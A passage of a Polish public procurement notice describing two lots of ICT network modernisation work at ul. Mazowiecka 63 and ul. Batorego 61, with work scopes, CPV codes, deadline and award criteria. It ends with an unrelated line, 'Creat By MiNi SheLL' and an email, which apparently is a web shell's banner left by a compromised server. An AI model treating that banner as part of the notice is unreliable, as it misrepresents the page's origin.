<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający wyklucza z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja sieci teleinformatycznej w budynku przy ul. Mazowieckiej 63.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje w szczególności:
1)	demontaż istniejącej sieci strukturalnej,
2)	demontaż istniejącej dedykowanej instalacji elektrycznej,
3)	demontaż istniejącej instalacji telefonicznej, 
4)	demontaż 4 klimatyzatorów,
5)	demontaż i utylizacja zużytych akumulatorów z 2 UPS-ów szaf serwerowych,
6)	montaż instalacji teleinformatycznej zgodnie z załączonym projektem,
7)	dostarczenie i montaż telefonicznego przewodu zgodnie z załączonym projektem,
8)	montaż dedykowanej instalacji elektrycznej, wraz z tablicą główną,
9)	dostarczenie i montaż  4 klimatyzatorów,
10)	dostarczenie i montaż akumulatorów do 2 (dwóch) UPS-ów, model APC typ 5000XL,
11)	dostarczenie i montaż szaf dystrybucyjnych do  GPD, oraz szafy serwerowej,
12)	instalację urządzeń aktywnych i pasywnych w szafach,
13)	pomiary odbiorcze instalacji elektrycznych,
14)	pomiary odbiorcze sieci logicznej,
15)	naprawa powierzchni ścian po demontażach,
16)	przestawianie mebli i powrót do stanu wyjściowego,
17)	zabezpieczenie wyposażenia pokoi przed zanieczyszczeniem,
18)	usuwanie z obszaru robót gruzu i odpadów na koszt Wykonawcy wraz z utylizacją,
19)	naprawa ścian po przekuciach wraz z uzupełnieniami i malowaniem,
20)	dostarczenie przełącznika sieciowego w ramach pierwszego wyposażenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.31.10.00-0, 45.31.11.00-1, 45.31.11.00-1, 45.31.12.00-2, 45.31.40.00-1, 45.40.00.00-1, 32.41.00.00-0, 32.42.00.00-3, 72.71.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. okres rękojmi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja sieci teleinformatycznej w budynkach przy ul. Batorego 61.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje w szczególności:
1)	demontaż istniejącej sieci strukturalnej,
2)	demontaż istniejącej dedykowanej instalacji elektrycznej,
3)	demontaż 6 klimatyzatorów,  
4)	demontaż i utylizacja zużytych akumulatorów z 2 UPS-ów.
5)	montaż instalacji teleinformatycznej zgodnie z załączonym projektem,
6)	dostarczenie i montaż połączeń światłowodowych zgodnie z załączonym projektem,
7)	dostarczenie i montaż telefonicznego przewodu zgodnie z załączonym projektem,
8)	montaż dedykowanej instalacji elektrycznej, wraz z tablicą główną,
9)	dostarczenie i montaż  6 klimatyzatorów,
10)	dostarczenie i montaż 2 zasilaczy awaryjnych UPS,
11)	dostarczenie i montaż szaf dystrybucyjnych do  GPD,
12)	instalacja urządzeń aktywnych i pasywnych w szafach,
13)	pomiary odbiorcze instalacji elektrycznych,
14)	pomiary odbiorcze sieci logicznej,
15)	naprawa powierzchni ścian po demontażach,
16)	przestawianie mebli i powrót do stanu wyjściowego,
17)	zabezpieczenie wyposażenia pokoi przed zanieczyszczeniem,
18)	usuwanie z obszaru robót gruzu i odpadów na koszt Wykonawcy wraz z utylizacją,
19)	naprawa ścian po przekuciach wraz z uzupełnieniami i malowaniem,
20)	dostarczenie przełącznika sieciowego w ramach pierwszego wyposażenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.31.10.00-0, 45.31.11.00-1, 45.31.12.00-2, 45.31.40.00-1, 45.40.00.00-1, 32.41.00.00-0, 32.42.00.00-3, 72.71.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. okres rękojmi - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com